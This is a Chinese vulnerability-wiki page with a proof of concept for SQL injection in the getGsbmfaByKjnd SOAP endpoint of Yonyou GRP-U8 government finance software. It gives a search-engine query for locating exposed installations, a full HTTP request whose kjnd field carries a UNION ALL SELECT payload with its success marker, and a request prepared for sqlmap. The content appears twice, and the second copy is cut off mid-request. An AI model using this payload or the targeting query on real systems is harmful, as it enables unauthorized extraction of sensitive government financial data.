fofamini-wiki

登录白背景

源码

用友GRP-U8 新政府会计制度专版getGsbmfaByKjndSQL注入漏洞

一、漏洞简介

用友GRP-U8行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 行政事业内控版getGsbmfaByKjnd接口存在SQL注入漏洞，攻击者通过该漏洞可以获取数据库敏感信息。

二、影响版本

用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）

三、资产测绘

hunterapp.name="用友GRP-U8 OA"&&web.title="用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）"

特征

四、漏洞复现

漏洞位置

  /services

参数kjnd存在SQL注入漏洞，返回响应为“qzvpqOZOHMMvtbLzaUYEuIzdQlgzOnITofSgBOeIxSsofqbvbq”表示存在漏洞

POST /services/operOriztion HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=89E46B07C2BF4021A3C408C6B580CC55
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 969

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
   <soapenv:Header/>
   <soapenv:Body>
      <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <kjnd xsi:type="xsd:string">gero et' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(79)+CHAR(90)+CHAR(79)+CHAR(72)+CHAR(77)+CHAR(77)+CHAR(118)+CHAR(116)+CHAR(98)+CHAR(76)+CHAR(122)+CHAR(97)+CHAR(85)+CHAR(89)+CHAR(69)+CHAR(117)+CHAR(73)+CHAR(122)+CHAR(100)+CHAR(81)+CHAR(108)+CHAR(103)+CHAR(122)+CHAR(79)+CHAR(110)+CHAR(73)+CHAR(84)+CHAR(111)+CHAR(102)+CHAR(83)+CHAR(103)+CHAR(66)+CHAR(79)+CHAR(101)+CHAR(73)+CHAR(120)+CHAR(83)+CHAR(115)+CHAR(111)+CHAR(102)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113)-- aKCq</kjnd>
      </wsdd:getGsbmfaByKjnd>
   </soapenv:Body>
</soapenv:Envelope>

sqlmap

POST /services/operOriztion HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=89E46B07C2BF4021A3C408C6B580CC55
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 476

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
   <soapenv:Header/>
   <soapenv:Body>
      <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <kjnd xsi:type="xsd:string">gero et</kjnd>
      </wsdd:getGsbmfaByKjnd>
   </soapenv:Body>
</soapenv:Envelope>

原文: https://www.yuque.com/xiaokp7/ocvun2/pmz86aovt8uihtrx

# 用友GRP-U8 新政府会计制度专版getGsbmfaByKjndSQL注入漏洞

# 一、漏洞简介
 用友GRP-U8行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 行政事业内控版getGsbmfaByKjnd接口存在SQL注入漏洞，攻击者通过该漏洞可以获取数据库敏感信息。

# 二、影响版本

- 用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）

# 三、资产测绘

- hunter`app.name="用友GRP-U8 OA"&&web.title="用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）"`

![image.png](./img/WtrXPd52sWxTcj9c/1695799595770-3d39cc9d-6e29-4cfc-9008-11176521e1a1-704533.png)

- 特征

![image.png](./img/WtrXPd52sWxTcj9c/1695479279929-1afc93af-d2c3-48d2-9d15-fa2c15c8abd2-252276.png)

# 四、漏洞复现
漏洞位置
```
  /services
```
![image.png](./img/WtrXPd52sWxTcj9c/1695799326598-79fa1052-6808-493d-a8a1-7f35173a84ed-706511.png)
参数kjnd存在SQL注入漏洞，返回响应为“qzvpqOZOHMMvtbLzaUYEuIzdQlgzOnITofSgBOeIxSsofqbvbq”表示存在漏洞
```
POST /services/operOriztion HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=89E46B07C2BF4021A3C408C6B580CC55
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 969

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
   <soapenv:Header/>
   <soapenv:Body>
      <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <kjnd xsi:type="xsd:string">gero et' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(79)+CHAR(90)+CHAR(79)+CHAR(72)+CHAR(77)+CHAR(77)+CHAR(118)+CHAR(116)+CHAR(98)+CHAR(76)+CHAR(122)+CHAR(97)+CHAR(85)+CHAR(89)+CHAR(69)+CHAR(117)+CHAR(73)+CHAR(122)+CHAR(100)+CHAR(81)+CHAR(108)+CHAR(103)+CHAR(122)+CHAR(79)+CHAR(110)+CHAR(73)+CHAR(84)+CHAR(111)+CHAR(102)+CHAR(83)+CHAR(103)+CHAR(66)+CHAR(79)+CHAR(101)+CHAR(73)+CHAR(120)+CHAR(83)+CHAR(115)+CHAR(111)+CHAR(102)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113)-- aKCq</kjnd>
      </wsdd:getGsbmfaByKjnd>
   </soapenv:Body>
</soapenv:Envelope>
```
![image.png](./img/WtrXPd52sWxTcj9c/1695799451491-0f9b95a3-a006-4316-b54d-581f667a46b7-135564.png)
sqlmap
```
POST /services/operOriztion HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=89E46B07C2BF4021A3C408C6B580CC55
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 476

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pmz86aovt8uihtrx>